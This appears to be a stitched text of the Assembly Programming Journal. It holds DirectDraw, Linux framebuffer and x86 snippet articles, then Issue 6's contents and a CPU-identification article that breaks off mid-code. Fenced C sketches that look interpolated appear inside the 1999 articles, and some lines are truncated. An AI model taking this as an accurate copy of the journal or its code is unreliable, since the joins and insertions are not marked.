INVOKE GetFocus
.IF eax == hWnd
mov [ddsd.dwSize] , SIZEOF DDSURFACEDESC
mov [ddsd.dwFlags] , DDSD_PITCH
.WHILE 1
DDSINVOKE mLock, lpDDSPrimary, NULL, ADDR ddsd,
DDLOCK_WAIT, NULL
.BREAK .IF eax == DD_OK
.IF eax == DDERR_SURFACELOST
DDSINVOKE Restore, lpDDSPrimary
.ELSE
FATAL "Couldn't lock surface"
.ENDIF
.ENDW
DDINVOKE WaitForVerticalBlank, lpDD, DDWAITVB_BLOCKBEGIN,
NULL
call nextFrame
DDSINVOKE Unlock, lpDDSPrimary, ddsd.lpSurface
.ENDIF
.ENDIF
.ENDW
.IF lpDD != NULL
.IF lpDDSPrimary != NULL
DDSINVOKE Release, lpDDSPrimary
mov [lpDDSPrimary] , NULL
.ENDIF
DDINVOKE Release, lpDD
mov [lpDD] , NULL
.ENDIF
LRETURN msg.wParam
WinMain ENDP
;-----------------------------------------------------------;
; Window Proc ( handle events ) ;
;-----------------------------------------------------------;
WndProc PROC hWin :DWORD,
uMsg :DWORD,
wParam :DWORD,
lParam :DWORD
.IF uMsg == WM_KEYDOWN
.IF wParam == VK_ESCAPE
INVOKE PostQuitMessage, NULL
RETURN 0
.ENDIF
.ELSEIF uMsg == WM_DESTROY
INVOKE PostQuitMessage, NULL
RETURN 0
.ENDIF
INVOKE DefWindowProc, hWin, uMsg, wParam, lParam
ret
WndProc ENDP
END start
;End_Ddplasma32.asm____________________________________________________________
I had mail problems last time... I don't think the example program from
the DDRAW tut ever reached you... and now you were looking for a Windows
article for issue #6... Maybe you can put the example in there... It's
Win32, and it would also double as a sequel to the article of issue #5
:)
Well, there's 2 examples actually... They look the same on screen, but 1
displays how to use 8 bit palette mode (like good old mode 13h), where
the other shows 32 bit truecolor mode...
I also included the original DDRAW.INC, so people can assemble the
sources themselves...
I hope this time it reaches you, and that I could have been of help to
you,
X-Calibre
WINDOWS
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
Enter fbcon
by Konstantin Boldyshev
Many Linux users have heard something about fbcon. It is becoming more
and more popular, mostly because it makes graphics available on an
ordinary terminal without X. So how do you use the graphics capabilities
of fbcon?
The /dev/fb# devices represent frame buffer devices; they allow the frame
buffer of a video card to be read and written to by a user, and allow a
programmer to access the video hardware [and, more importantly, the video
memory] through ioctls and memory mapping.
The general approach to using fbcon is pretty simple:
1) open /dev/fb0
2) mmap /dev/fb0
3) .. do the thing .. (use pointer returned by mmap to access videomemory)
4) munmap /dev/fb0
5) close /dev/fb0
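The five steps above can be sketched in C with the error checks that a size-optimized intro usually leaves out. This is only an illustration: fb_map() and fb_unmap() are hypothetical helper names, and the caller is assumed to know the length of the visible frame buffer (640*480 bytes in the 8-bit mode used later in this article).

```c
#include <assert.h>
#include <fcntl.h>
#include <stddef.h>
#include <sys/mman.h>
#include <unistd.h>

/* Steps 1 and 2: open the device and map `len` bytes of it read/write.
   Returns the mapping and stores the descriptor in *fd_out, or returns
   NULL (with *fd_out set to -1) if either step fails.
   fb_map is a hypothetical helper name, not part of any library. */
unsigned char *fb_map(const char *path, size_t len, int *fd_out)
{
    assert(path != NULL && fd_out != NULL);
    *fd_out = -1;

    int fd = open(path, O_RDWR);
    if (fd < 0)
        return NULL;                    /* missing device or no permission */

    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if (mem == MAP_FAILED) {
        close(fd);
        return NULL;
    }

    *fd_out = fd;
    return mem;                         /* step 3: draw through this pointer */
}

/* Steps 4 and 5: drop the mapping and close the device. */
void fb_unmap(unsigned char *mem, size_t len, int fd)
{
    munmap(mem, len);
    close(fd);
}
```

A caller would use fb_map("/dev/fb0", 640 * 480, &fd), write pixels through the returned pointer, and finish with fb_unmap(). A NULL result means the device could not be opened or mapped.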
I've taken one of my old DOS intros, made in tasm, and rewritten it for nasm
and Linux/fbcon. At 408 bytes, this intro is the smallest implementation of
linear transformation with recursion (AFAIK).
Leaves.asm runs for about a minute and a half (depending on the machine), and
can be interrupted at any time with ^C. If everything is ok you should see two
branches of green leaves, and a kind of wind blowing on them. It MUST be run
only in 640x480x256 mode (vga=0x301 in lilo.conf). You will see garbage or
incorrect colors in other modes.
Warning! The intro assumes that everything is ok with the system (/dev/fb0
exists, can be opened and mmap()ed, the correct video mode is set, and so on).
So, if you aren't root, check the permissions on /dev/fb0 first, or you will
not see anything.
The source is quite portable; you only need to implement putpixel() and the
initialization part for your OS. To get the basic idea across, here is the
fbcon implementation in C:
//==========================================================================
// leaves.c : C implementation using /dev/fb0
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
typedef unsigned char byte;
typedef unsigned int word;
typedef float dword;
#define MaxX 640
#define MaxY 480
#define VMEM_SIZE MaxX*MaxY
#define xc MaxX/2
#define yc MaxY/2
#define xmin0 100
#define xmax0 -xmin0
#define ymin0 xmin0
#define ymax0 -ymin0
#define colornum 8
int h;
byte *p;
byte ColorTable[colornum] = { 0x00,0x00,0x02,0x00,0x00,0x02,0x0A,0x02 };
int color=0;
dword f=MaxY/(ymax0-ymin0)*3/2;
dword x1coef=MaxX-MaxY*4/9-yc;
dword y1coef=MaxY/4+xc;
dword x2coef=MaxY*4/9+yc;
dword x0=110;
dword a=0.7;
dword b=0.2;
dword c=0.5;
dword d=0.3;
void putpixel(word x,word y,byte color)
{
*(p+y*MaxX+x) = color;
}
void leaves(dword x,dword y,byte n)
{
word x1,y1;
if (n>0)
{
y1=f*x+y1coef;
putpixel(x1coef-f*y,y1,ColorTable[color]);
putpixel(f*y+x2coef,y1,ColorTable[color]);
if (++color>colornum-1) color=0;
leaves(a*x+b*y, b*x-a*y, n-1);
leaves(c*(x-x0)-d*y+x0,d*(x-x0)+c*y,n-1);
}
}
int main(void)
{
int i;
h=open("/dev/fb0",O_RDWR);
p=mmap(0,VMEM_SIZE,PROT_READ|PROT_WRITE,MAP_SHARED,h,0);
for (i=0;i<VMEM_SIZE;i++) *(p+i) = 0;
leaves(0,0,28);
munmap(p,VMEM_SIZE);
close(h);
}
//--------------------------------------------------------------------------EOF
Here is the asm source. It is quite short and self-explaining :) Well,
actually the source is heavily optimized for size, contains some
Linux-specific tricks, and can be hard to understand. Please refer to the C
source for areas that need clarification.
NOTE: The following source was taken from asmutils and requires the asmutils
macros (*.inc), available from http://linuxassembly.org;
you can also download the binary there (in the samples archive).
To compile leaves.asm:
$ nasm -f elf leaves.asm
$ ld -s -o leaves leaves.o
;==========================================================================
;Copyright (C) 1999 Konstantin Boldyshev <konst@...>
;
;leaves - fbcon intro in 408 bytes
;
;Ah, /if you haven't guessed yet/ the license is GPL, so enjoy! :)
%include "system.inc"
%assign SIZE_X 640
%assign SIZE_Y 480
%assign DEPTH 8
%assign VMEM_SIZE SIZE_X*SIZE_Y
%define MaxX 640.0
%define MaxY 480.0
%define xc MaxX/2
%define yc MaxY/2
%define xmin0 100.0
%define xmax0 -xmin0
%define ymin0 xmin0
%define ymax0 -ymin0
CODESEG
;al - color
putpixel:
push edx
lea edx,[ebx+ebx*4] ;computing offset: edx = y*5
shl edx,byte 7 ;*128, so edx = y*640
add edx,[esp+8] ;
mov [edx+esi],al ;write to frame buffer
pop edx
_return:
ret
; recursive function itself
leaves:
mov ecx,[esp+12]
test cl,cl
jz _return
mov [esp-13],cl
mov eax,[edi]
push ecx
sub esp,byte 8
mov edx,esp
fld dword [ebp+16] ;[f]
fld st0
fld st0
fmul dword [edx+16]
fadd dword [ebp+24] ;[y1coef]
fistp dword [edx]
mov ebx,[edx]
fmul dword [edx+20]
fsubr dword [ebp+20] ;[x1coef]
fistp dword [edx]
call putpixel
fmul dword [edx+20]
fadd dword [ebp+28] ;[x2coef]
fistp dword [edx]
call putpixel
inc edi
cmp edi,ColorEnd
jl .rec
sub edi,byte ColorEnd-ColorBegin
.rec:
fld dword [ebp+4] ;[b]
fld dword [ebp] ;[a]
fld st1
fld st1
fxch
fmul dword [edx+16]
fxch
fmul dword [edx+20]
fsubp st1
fstp dword [edx-8]
fmul dword [edx+16]
fxch
fmul dword [edx+20]
faddp st1
dec ecx
push ecx
sub esp,byte 8
fstp dword [esp]
call leaves ;esp+12
mov edx,esp
fld dword [ebp+12] ;[d]
fld dword [edx+28]
fld dword [ebp+8] ;[c]
fld dword [ebp+32] ;[x0]
fsub to st2
fld st3
fld st2
fxch
fmul st4
fxch
fmul dword [edx+32]
faddp st1
fstp dword [edx-8]
fxch
fmulp st2
fxch st2
fmul dword [edx+32]
fsubp st1
faddp st1
push ecx
sub esp,byte 8
fstp dword [esp]
call leaves
add esp,byte 12*2+8
pop ecx
.return:
ret
;------------------------------------- main()
START:
;prepare structure for mmap on the stack
mov edi,VMEM_SIZE
mov esi,esp
mov [esi-16],edi ;.len
mov [esi-12],byte PROT_READ|PROT_WRITE ;.prot
mov [esi-8],byte MAP_SHARED ;.flags
mov [esi],edx ;.offset
;init fb
mov ebp,Params
lea ebx,[ebp+0x2C] ;fb-Params
sys_open EMPTY,O_RDWR
test eax,eax ;have we opened file?
js exit
mov [esi-4],eax ;mm.fd
lea ebx,[esi-20]
sys_mmap
test eax,eax ;have we mmaped file?
js exit
mov esi,eax
;clear screen
mov ecx,edi
mov edi,esi
xor eax,eax
rep stosb
;leaves
lea edi,[ebp+0x24] ;ColorBegin-Params
push byte 28 ;recursion depth
push eax
push eax
call leaves
;close fb
sys_munmap esi,VMEM_SIZE
sys_close [mm.fd]
exit:
sys_exit
;----------------------------Parameters
Params:
a dd 0.7
b dd 0.2
c dd 0.5
d dd 0.3
f dd 0xc0400000 ;MaxY/(ymax0-ymin0)*3/2
x1coef dd 0x433b0000 ;MaxX-MaxY*4/9-yc
y1coef dd 0x43dc0000 ;MaxY/4+xc
x2coef dd 0x43e28000 ;MaxY*4/9+yc
x0 dd 112.0
ColorBegin:
db 0,0,2,0,0,2,10,2
ColorEnd:
fb db "/dev/fb0";,NULL
END
;===========================================================================EOF
More information on the frame buffer device can be found in the Linux kernel
documentation [ usually /usr/src/linux/Documentation ], in the files
framebuffer.txt, internals.txt, matroxfb.txt, tgafb.txt, and vesafb.txt. The
/dev/fb# ioctls are defined in /usr/include/linux/fb.h .
Enjoy the demo!
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................ASSEMBLY.LANGUAGE.SNIPPETS
TOHEX
by Ronald
;Summary: Convert hexadecimal digits to ASCII
;Compatibility: PowerPC platform
;Notes: Reads 3 parameters in R1-R3
; R1 = Number to convert to ASCII representation
; R2 = Number of LSD's of R1 to convert
; R3 = Address to store ASCII representation of number to
; R31 = Temp register that holds 4 bits
; Note that R1 is ruined during execution
.global TOHEX, TOHEX_LOOP, LT_TEN, STEP_OVER, TOHEX_EXIT
TOHEX:
cmpwi R2, 0
beq TOHEX_EXIT
TOHEX_LOOP:
andi. R31, R1, 15
cmpwi R31, 10
blt LT_TEN
addi R31, R31, 'A'-10
b STEP_OVER
LT_TEN:
ori R31, R31, '0'
STEP_OVER:
srwi R1, R1, 4
subi R2, R2, 1
stbx R31, R2, R3
cmpwi R2, 0
bne TOHEX_LOOP
TOHEX_EXIT:
blr
Hex2ASCII
by
cpuburn
;Summary: Converts
;Compatibility: K7
;Notes: This
; While doing some light reading of the AMD K7 Athlon Optimization
;Manual, I came across one of the neatest hex-to-ASCII converters
;I've ever seen:
Example 5 - Hexadecimal to ASCII conversion
(y=x < 10 ? x + 0x30: x + 0x41):
MOV AL, [X] ;load X value
CMP AL, 10 ;if x is less than 10, set carry flag
SBB AL, 69h ;0..9 -> 96h..9Fh, Ah..Fh -> A1h..A6h
DAS ;0..9: subtract 66h, Ah..Fh: subtract 60h
MOV [Y],AL ;save conversion in y
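To see why the CMP/SBB/DAS sequence lands on the right characters, it can help to model the flag behaviour in C. The following is only a sketch: das_model() and nibble_to_hex() are names invented for this illustration, and the flag handling follows the documented behaviour of SBB and DAS, not any code from the AMD manual.

```c
#include <assert.h>
#include <stdint.h>

/* Software model of DAS: al is the value in AL, cf and af are the carry
   and auxiliary-carry flags on entry. Hypothetical helper. */
static uint8_t das_model(uint8_t al, int cf, int af)
{
    uint8_t old_al = al;
    if ((al & 0x0F) > 9 || af)
        al = (uint8_t)(al - 0x06);      /* low-nibble adjust */
    if (old_al > 0x99 || cf)
        al = (uint8_t)(al - 0x60);      /* high-nibble adjust */
    return al;
}

/* Models MOV AL,[X] / CMP AL,10 / SBB AL,69h / DAS for x in 0..15. */
char nibble_to_hex(uint8_t x)
{
    assert(x < 16);
    int borrow_in = (x < 10);                  /* CMP AL,10 sets CF if x < 10 */
    uint8_t sub = (uint8_t)(0x69 + borrow_in); /* SBB subtracts 69h + CF */
    int af = (x & 0x0F) < (sub & 0x0F);        /* borrow out of bit 3 */
    int cf = x < sub;                          /* always a borrow, since x < 16 */
    uint8_t al = (uint8_t)(x - sub);           /* 96h..9Fh or A1h..A6h */
    return (char)das_model(al, cf, af);
}
```

For the digits 0..9 both DAS adjustments fire (66h in total), while for Ah..Fh only the 60h adjustment does, which is what the comments in the listing describe.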
MMX ltostr
by Cecchinel Stephan
;Summary: Convert long [dword] value to an ASCII string
;Compatibility: MMX
;Notes: Converts a number in EAX to an 8 bytes hexadecimal string
; at [edi]
; 14 clocks on a Celeron-333
Sum1: dd 0x30303030, 0x30303030
Mask1: dd 0x0f0f0f0f, 0x0f0f0f0f
Comp1: dd 0x09090909, 0x09090909
Hex32:
bswap eax
movq mm3,[Sum1]
movq mm4,[Comp1]
movq mm2,[Mask1]
movq mm5,mm3
psubb mm5,mm4
movd mm0,eax
movq mm1,mm0
psrlq mm0,4
pand mm0,mm2
pand mm1,mm2
punpcklbw mm0,mm1
movq mm1,mm0
pcmpgtb mm0,mm4
pand mm0,mm5
paddb mm1,mm3
paddb mm1,mm0
movq [edi],mm1
ret
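The same idea (split the value into one nibble per byte, then add 30h to every byte and a further 27h to the bytes above 9) can be tried without MMX. The sketch below is an assumption-laden illustration, not a translation of the routine above: hex32_swar() is a hypothetical name, a 64-bit integer stands in for the MMX register, and the PCMPGTB compare is replaced by an add-6-and-shift trick.

```c
#include <assert.h>
#include <stdint.h>

/* Writes the 8 lowercase hex digits of `value` to out[0..7],
   most significant digit first. No terminating NUL is written. */
void hex32_swar(uint32_t value, char out[8])
{
    assert(out != 0);

    /* Spread the 8 nibbles so that byte k of t holds nibble k of value. */
    uint64_t t = value;
    t = (t | (t << 16)) & 0x0000FFFF0000FFFFULL;
    t = (t | (t << 8))  & 0x00FF00FF00FF00FFULL;
    t = (t | (t << 4))  & 0x0F0F0F0F0F0F0F0FULL;

    /* Per byte: 1 if the nibble is greater than 9, else 0
       (n + 6 carries into bit 4 exactly when n >= 10). */
    uint64_t gt9 = ((t + 0x0606060606060606ULL) >> 4) & 0x0101010101010101ULL;

    /* '0' + n for 0..9, and '0' + 27h + n = 'a' + (n - 10) for 10..15. */
    t += 0x3030303030303030ULL + gt9 * 0x27;

    for (int i = 0; i < 8; i++)
        out[i] = (char)((t >> (8 * (7 - i))) & 0xFF);
}
```

The constant 27h is the same value the MMX routine computes as Sum1 minus Comp1 (30h - 09h), so both versions produce lowercase digits.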
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................ISSUE.CHALLENGE
by Laura Fairhead
Challenge
~~~~~~~~~
Write a program that takes a snapshot of a text screen and writes it
to a file. It should work in any text mode and lines should be terminated
with newlines in the file so that it can easily be viewed in a standard
editor. ( 04Dh = 77 bytes )
Solution
~~~~~~~~
If you want to assemble this, just remember that the FS: override prefix is
the byte 064h, as MASM can't cope with legal x86 code. Then just replace the
(single) offset 0148h with some name; the data there is the filename at the
end, "SNAP",0. Obviously the B's prefixing the addresses mean "BYTE PTR", and
ALL the numbers are in HEX.
=Z10 0
=NSUC0.COM
=L
0000004D
=U100 147
1CB6:0100 B8 30 11 MOV AX,1130
1CB6:0103 32 FF XOR BH,BH
1CB6:0105 CD 10 INT 10 ;DL=rows-1
1CB6:0107 B4 0F MOV AH,0F
1CB6:0109 CD 10 INT 10 ;AH=columns
1CB6:010B 0E PUSH CS ;1st BIOS call
1CB6:010C 07 POP ES ;corrupts ES
1CB6:010D 52 PUSH DX ;
1CB6:010E 50 PUSH AX ;set B[BP+1]=columns
1CB6:010F 8B EC MOV BP,SP ; B[BP+2]=rows
1CB6:0111 BA 48 01 MOV DX,0148 ;open (CREATE) file
1CB6:0114 33 C9 XOR CX,CX ;name "SNAP"
1CB6:0116 B4 3C MOV AH,3C
1CB6:0118 CD 21 INT 21
1CB6:011A 93 XCHG BX,AX ;handle stays in BX
1CB6:011B 33 F6 XOR SI,SI ;SI read screen offset
1CB6:011D BA 80 00 MOV DX,0080 ;DX data store in PSP
1CB6:0120 B8 00 B8 MOV AX,B800
1CB6:0123 8E E0 MOV FS,AX ;FS screen segment
1CB6:0125 8B FA MOV DI,DX ;outer loop rows
1CB6:0127 0F B6 4E 01 MOVZX CX,B [BP+0001] ;miss out the attribute
1CB6:012B 64 AD FS: LODSW ;byte, copying to
1CB6:012D AA STOSB ;DS:080
1CB6:012E E2 FB LOOP 012B
1CB6:0130 B8 0D 0A MOV AX,0A0D ;n/l on row end
1CB6:0133 AB STOSW
1CB6:0134 8B CF MOV CX,DI
1CB6:0136 2B CA SUB CX,DX ;CX=data length
1CB6:0138 B4 40 MOV AH,40 ;write row to file
1CB6:013A CD 21 INT 21
1CB6:013C FE 4E 02 DEC B [BP+0002] ;loop for row count
1CB6:013F 79 E4 JNS 0125
1CB6:0141 66 58 POP EAX ;clean-up stack
1CB6:0143 B4 3E MOV AH,3E ;close file
1CB6:0145 CD 21 INT 21
1CB6:0147 C3 RET ;go CS:0 !
=D148 14C
1CB6:0148 53 4E 41 50 00 SNAP
=Q
If you've never seen the 2 BIOS calls before then you'd better take a look
at Ralf Brown's legendary interrupt list.
You may always override the source segment DS: on a string instruction,
but you cannot override the destination segment ES: ever.
It's left as an exercise for you to incorporate error handling (since there
is none) and still better the length of this code ;)
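For readers who find the DEBUG listing hard to follow, the core of the solution (skip every attribute byte, end each row with CR/LF) can be sketched in C. This is only an illustration under stated assumptions: snapshot_text() is a hypothetical name, the screen is passed in as an array of 16-bit cells instead of being read from segment B800h, and the output goes to a memory buffer where the original writes each row to the file with INT 21h.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* cells: rows*cols text-mode cells, low byte = character code,
   high byte = attribute. out must have room for rows*(cols+2) bytes.
   Returns the number of bytes written. */
size_t snapshot_text(const uint16_t *cells, int rows, int cols, char *out)
{
    assert(cells != NULL && out != NULL && rows >= 0 && cols >= 0);
    size_t n = 0;
    for (int r = 0; r < rows; r++) {
        for (int c = 0; c < cols; c++)
            out[n++] = (char)(cells[r * cols + c] & 0xFF); /* drop attribute */
        out[n++] = '\r';                                   /* 0Dh */
        out[n++] = '\n';                                   /* 0Ah */
    }
    return n;
}
```

The inner loop plays the role of the FS: LODSW / STOSB pair, and the two stores after it correspond to MOV AX,0A0D / STOSW.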
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::.......................................................FIN
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::. Oct/Nov 99
:::\_____\::::::::::. Issue 6
::::::::::::::::::::::.........................................................
A S S E M B L Y P R O G R A M M I N G J O U R N A L
http://asmjournal.freeservers.com asmjournal@...
T A B L E O F C O N T E N T S
----------------------------------------------------------------------
Introduction...................................................mammon_
"Processor Identification"........................Chris.Dragan.&.Chili
"Timing with the 8254 PIT"...............................Jan.Verhoeven
"Programming the Universal Graphics Mode"................Jan.Verhoeven
"Conway's Game of Life".................................Laura.Fairhead
"'Ambulance Car' Disassembly"....................................Chili
"'Ambulance Car' Disinfector"....................................Chili
"Assembling for PIC's"...................................Jan.Verhoeven
"Splitting Strings"............................................mammon_
"String to Numeric Conversion"..........................Laura.Fairhead
Column: Win32 Assembly Programming
"WndProc, The Dirty Way".................................X-Calibre
"Programming the DOS Stub"...............................X-Calibre
Column: The Unix World
"Using ioctl()"............................................mammon_
Column: Assembly Language Snippets
"BinToString"....................................Cecchinel Stephan
Column: Issue Solution
"Absolute Value"....................................Laura.Fairhead
----------------------------------------------------------------------
++++++++++++++++++Issue Challenge+++++++++++++++++
Find the Absolute Value of a Register in 4 Bytes
----------------------------------------------------------------------
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::..............................................INTRODUCTION
by mammon_
Customarily I'll start with the bad news: this issue is about a week late,
primarily because I had forgotten about the two Win32 articles X-Calibre
passed on to me a month or two ago. The good news, however, is that there
may be a December issue; currently I have about 5 or so extra articles that
threatened to bump this issue over the 200K mark. Eventually I may have a
chance to be late on a monthly basis...
This issue has a bit of a 'back to the basics' feel about it. Packed inside
are articles dealing with some of the 'classics' of assembly: CPU identific-
ation, graphics, and the ever-popular Game of Life. The disassembly of the
Ambulance Car virus also has an old-school feeling to it, hearkening back to
the old days of DOS and com files.
Additional highlights include X-Calibre's 'bending windows to your will' Win32
articles, two excellent chip programming articles from Jan, utility routines
from Laura and myself, and of course my usual attempt to defend assembly as a
viable programming language for the Unix environment.
Enough commentary; time to get this mag on the road!
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Processor Identification
by Chris Dragan & Chili
Being able to identify the processor on which your program is running can be a
very useful feature, if not to ensure that your program will work on a wider
range of computers, then at least to provide minimum compatibility and
guarantee that it will not crash on some processors.
The first part of this article explains how to distinguish between the 80486
and older processors by checking for known behaviours, while the second part
(written by Chris) takes it one step further, explaining how to use the CPUID
instruction on newer processors, how to read the ID register by means of a
triple-fault reset (TFR), and how to correctly identify a Cyrix processor.
EFLAGS Register
---------------
On old pre-286 CPUs, bits 12 through 15 of the FLAGS register are always set,
so we can tell this type of processor apart from newer ones by attempting to
clear those bits:
pushf
pop ax
and ax, 0fffh ; clear bits 12-15
push ax
popf
pushf
pop ax
and ax, 0f000h
cmp ax, 0f000h ; check if bits 12-15 are set
je _is_an_older_cpu
jne _is_a_286_or_higher
Once we know that we are at least on a 286 processor, we can then check to see
if we're on a 32-bit processor (386 or higher) or on an actual 286. For this
purpose we know that bits 12-15 of the FLAGS register are always clear on a 286
processor in real mode:
pushf
pop ax
or ax, 0f000h ; set bits 12-15
push ax
popf
pushf
pop ax
and ax, 0f000h ; check if bits 12-15 are clear
jz _is_a_286
jnz _is_a_386_or_higher
If instead, the processor is running in protected mode these bits are used for
the IOPL (bits 12-13) and NT (bit 14) flags. Note that bits 12-14 hold the last
value loaded into them on 32-bit processors in real mode. Also remember that
there is no virtual-8086 mode on 16-bit processors.
In order to find out if the processor is in real or protected mode we must test
if the Protection Enable flag (bit 0 of CR0) is set, if so then we're in
protected mode:
smsw ax
and ax, 0001h ; check if bit 0 (PE) is clear
jz _real_mode
jnz _protected_mode
To find out if it is a 486 or a newer processor we'll try to set the AC flag
(bit 18), since it is always clear on a 386 processor (also NexGen Nx586),
unlike newer ones that allow it to be toggled:
pushfd
pop eax
mov ebx,eax
xor eax,40000h ; toggle bit 18
push eax
popfd
pushfd
pop eax
xor eax,ebx ; check if bit 18 changed
jz _is_a_386
jnz _is_a_486_or_higher
And finally, to check if we're on an old 486 or on a new 486 or another newer
processor (e.g. Pentium), we'll try to toggle the ID flag (bit 21), which
indicates the presence of a processor that supports the CPUID instruction. This
part is explained below in a section about CPUID.
PUSH SP Instruction
-------------------
Before the 286, processors implemented the "PUSH SP" instruction in a different
way, updating the stack pointer before the value of SP is pushed onto the
stack, unlike newer processors which push the value of the SP register as it
existed before the instruction was executed (both in real and virtual-8086
modes).
Older CPUs 286+
{ {
SP = SP - 2 TEMP = SP
SS:SP = SP SP = SP - 2
} SS:SP = TEMP
}
(credit for the PUSH SP algorithm representation goes to Robert Collins)
So all one has to do is see if the values of the SP register are different
before and after the PUSH SP:
push sp
pop ax
cmp ax, sp ; check if SP values differ
je _is_a_286_or_higher
jne _is_an_older_cpu
Note - If you want the same result on all processors, use the following code
instead of a PUSH SP instruction:
push bp
mov bp, sp
xchg bp, [bp]
Shift and Rotate Instructions
-----------------------------
Starting with the 186/88, all processors mask shift/rotate counts by modulo 32,
restricting the maximum count to 31 (in all operating modes, including the
virtual-8086 mode). Earlier CPUs do not mask the shift/rotation count, using
all 8 bits of CL. So, if we try to shift a 16-bit register by 32, on newer
processors the value is left unchanged (since the shift count is masked to 0),
whereas on an older processor the result will be zero. A shift whose masked
count is zero leaves the flags untouched, so the result is tested explicitly:
mov ax, 0ffffh
mov cl, 32
shl ax, cl
test ax, ax ; check if result is zero
jz _is_an_older_cpu
jnz _is_a_18x_or_higher
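The reasoning behind this test can be checked with a small C model of the two behaviours. It is only a sketch: shl16_model() is a hypothetical name and the masks_count parameter is an illustrative switch between the two processor families, not something a real program could query.

```c
#include <stdint.h>

/* Models SHL on a 16-bit register.
   masks_count != 0: 186 and later, only the low 5 bits of the count are used.
   masks_count == 0: 8086/8088, all 8 bits of the count are used. */
uint16_t shl16_model(uint16_t value, uint8_t count, int masks_count)
{
    if (masks_count)
        count &= 31;
    if (count >= 16)
        return 0;                 /* every bit has been shifted out */
    return (uint16_t)((uint32_t)value << count);
}
```

With value 0FFFFh and a count of 32, the masking model returns 0FFFFh (the count becomes 0) and the non-masking model returns 0, which is the difference the assembly test relies on.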
MUL Instruction
---------------
NEC processors differ from Intel's with respect to the handling of the zero
flag (ZF) during a MUL operation. A NEC V20/V30 does not clear ZF after a
multiplication with a non-zero result, so ZF keeps the value it had before,
whereas an Intel 8086/88 will always clear it (note that this is only true for
the specified processors):
xor al, al ; force ZF to set
mov al, 40h
mul al ; check if ZF is clear
jz _is_a_NEC_V20_V30
jnz _is_an_Intel_808x
In addition to the list of sites where you can find more information, provided
by Chris at the end of this article, you can also try this one:
http://grafi.ii.pw.edu.pl/gbm/x86/ (Grzegorz Mazur)
And also the following packages/programs (available somewhere in the net):
The Undocumented PC (Frank van Gilluwe)
HelpPC (David Jurgens)
80x86.CPU file (Christian Ludloff)
ID Register
-----------
Beginning with the 80386 processor, Intel included a so-called ID register,
which contains information about the processor model and stepping. This
register is accessible in an unusual way - it is passed in DX after reset.
To read the ID register one must follow these steps:
1. By storing value 0Ah (resume with jump) at address 0Fh (reset code) in the
CMOS data area, inform BIOS not to issue POST after reset, but to return
the control to the program.
2. Update after-reset-far-jump address at 0040h:0067h.
3. Set shutdown status word (0040h:0072h) to 0, to avoid undesirable
side-effects.
4. Cause a reset.
Causing a reset is typically done by issuing a so-called triple-fault-reset,
i.e. causing an error from which the processor cannot recover and enters
a reset state. TFR (triple...) can be done only if we have enough control
over the processor, i.e. under plain DOS in real mode (no EMS) or under
Win'95 (this is risky). The following code shows how to do it in DOS. The code
is assumed to be in a COM program.
;------------------------------------------------------------------------------
section .data
GDT dd 0, 0 ; Selector 0 is empty
dd 0000FFFFh, 00009A00h ; Selector 8 - code segment
GDTR dw 000Fh, 0, 0 ; Limit 0Fh - two selectors
IDTR dw 0, 0, 0 ; Empty IDT will cause TFR
section .text
; Ensure that we are in real mode, not in V86
smsw ax
and al, 1
jnz near _skip_tfr_since_in_v86_mode
; Update code descriptor as we are going to enter pmode
xor eax, eax
mov ax, cs
shl eax, 4
or [GDT+10], eax
add eax, GDT
mov [GDTR+2], eax
; Update reset code in CMOS data area
cli ; Disable interrupts
mov [SaveSP], sp ; Save stack pointer
mov al, 0Fh ; Address 0Fh in CMOS area
out 70h, al
times 3 jmp short $+2 ; Short delay
mov al, 0Ah ; Value 0Ah - far jump
out 71h, al
; Update resume address
push word 0
pop es
mov [es:0467h], word _tfr ; offset
mov [es:0469h], cs ; segment
mov [es:0472h], word 0 ; Update shutdown status
; Switch to pmode
lgdt [GDTR] ; Load GDT
lidt [IDTR] ; Load empty IDT
smsw ax
or al, 01h ; Set pmode bit
lmsw ax
jmp 0008h:_reset ; Reload CS
_reset: mov ax, [cs:0FFFFh] ; Reach beyond segment limit
; After reset we are here with DX containing the ID register
_tfr: cli
mov ax, cs
mov ds, ax
mov es, ax
mov ss, ax
mov sp, [SaveSP]
sti
;------------------------------------------------------------------------------
Of course there are also other ways of reading the ID register. They are well
described in DDJ (www.x86.org).
As said before, the ID register contains information about processor model and
stepping. The format of the register is as follows:
bits 15..12 - stepping
bits 11..8 - model
bits 7..0 - revision
Some example ID register values:
0303 i386DX
2303 i386SX
3301 i376
This format of the ID register was used in Intel 386 processors (all except
RapidCAD), AMD 386 processors and most of IBM 486 processors.
Another format of the ID register was introduced with Intel 486 processors.
This format is similar to the format of CPUID model information (see below),
and until the Pentium was kept the same. However newer processors do not keep
any useful information in the ID register (it is usually 0). This also concerns
Cyrix 486 processors.
bits 15..14 - unused, zero
bits 13..12 - typically indicate overdrive
bits 11..8 - model
bits 7..4 - stepping
bits 3..0 - revision
And some example ID register values with this format for Intel processors:
0401 i486DX-25/33
0421 i486SX
0451 i486SX2
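Splitting a value in this second format into its fields is a matter of shifts and masks. The sketch below uses the field names from the table above; struct id486 and decode_id486() are names invented for this illustration.

```c
#include <stdint.h>

/* Fields of the 486-style ID register, named as in the table above. */
struct id486 {
    unsigned type;      /* bits 13..12, typically indicate overdrive */
    unsigned model;     /* bits 11..8 */
    unsigned stepping;  /* bits 7..4 */
    unsigned revision;  /* bits 3..0 */
};

/* dx: the value found in DX after reset. Bits 15..14 are ignored. */
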